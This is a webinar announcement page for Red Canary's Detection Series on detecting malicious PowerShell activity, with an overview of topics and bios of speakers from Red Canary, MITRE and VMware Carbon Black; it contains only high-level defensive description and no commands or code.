Resources • Webinars

The Detection Series: PowerShell

We’re exploring one of the year’s most prevalent MITRE ATT&CK® techniques: PowerShell. Join us to learn how adversaries abuse the Windows configuration management framework and how you can observe and detect malicious and suspicious commands and behaviors.

On-Demand

1 Hour

Virtual

More often than not, T1059.001: PowerShell has been the number one ATT&CK technique in Red Canary’s annual Threat Detection Report. In the five years that we’ve been mapping threats to ATT&CK, there’s no technique we’ve detected more often.

Installed on nearly every Windows operating system in the world, PowerShell is a versatile tool for automation and remote system management that’s beloved by administrators and adversaries alike. It allows adversaries to execute commands, obfuscate malicious activity, download arbitrary binaries, gather information, change system configurations, and much more—all while blending in with routine operating system activity.

In this highly anticipated Detection Series webinar, experts from VMware Carbon Black, MITRE ATT&CK®, and Red Canary will provide insight into:

Common ways that adversaries abuse PowerShell
Tools and log sources that collect relevant telemetry
How to detect, mitigate, and respond to malicious PowerShell activity
Strategies for testing your security controls by executing suspicious PowerShell commands with Atomic Red Team

Attendees will leave with a better understanding of what PowerShell is and how adversaries leverage it. More importantly, practitioners will know where to find malicious activity, how to develop detection analytics for it, and how to test their detection and visibility capabilities.

MEET THE SPEAKERS

Matt Graeber

Director, Threat Research | Red Canary

Matt has worked the majority of his security career in offense, facilitating his application of an attacker’s mindset to detection engineering. By pointing out gaps in detection coverage, Matt is able to effectively offer actionable detection improvement guidance. Matt loves to apply his reverse engineering skills to understand attack techniques at a deeper level in order to understand the workflow attackers use to evade security controls.

Sarah Lewis

Senior Detection Engineer | Red Canary

Sarah works on the Detection Engineering team, which is responsible for threat detection and intelligence research. Prior to joining Red Canary, Sarah worked for the Air Force (as a civilian) in a digital forensics and behavioral malware analysis lab. Outside work, she enjoys playing video games, crafting, and watching movies.

Jamie Williams

Principal Adversary Emulation Engineer | MITRE ATT&CK

Jamie is an adversary emulation engineer for The MITRE Corporation, where he focuses on security operations and research, adversary emulation, and behavior-based detections. He leads the development of MITRE ATT&CK® for Enterprise and has also led teams that help shape and deliver the “adversary-touch” within MITRE Engenuity ATT&CK Evaluations as well as the Center for Threat-Informed Defense (CTID).

Casey Parman

Manager & Lead, Threat Analysis Unit | VMWare SBU

Casey Parman is the Manager and Threat Lead of VMware Carbon Black's Threat Analysis Unit Applied Research. He is focused on staying ahead of modern adversary tools and techniques through threat hunting and attack emulation. He leads a team of researchers to collect actionable intelligence that bolsters the security of organizations of all sizes. By leveraging his expertise in threat detection and the MITRE ATT&CK framework, Casey develops customized security solutions that are optimized to protect against emerging threats.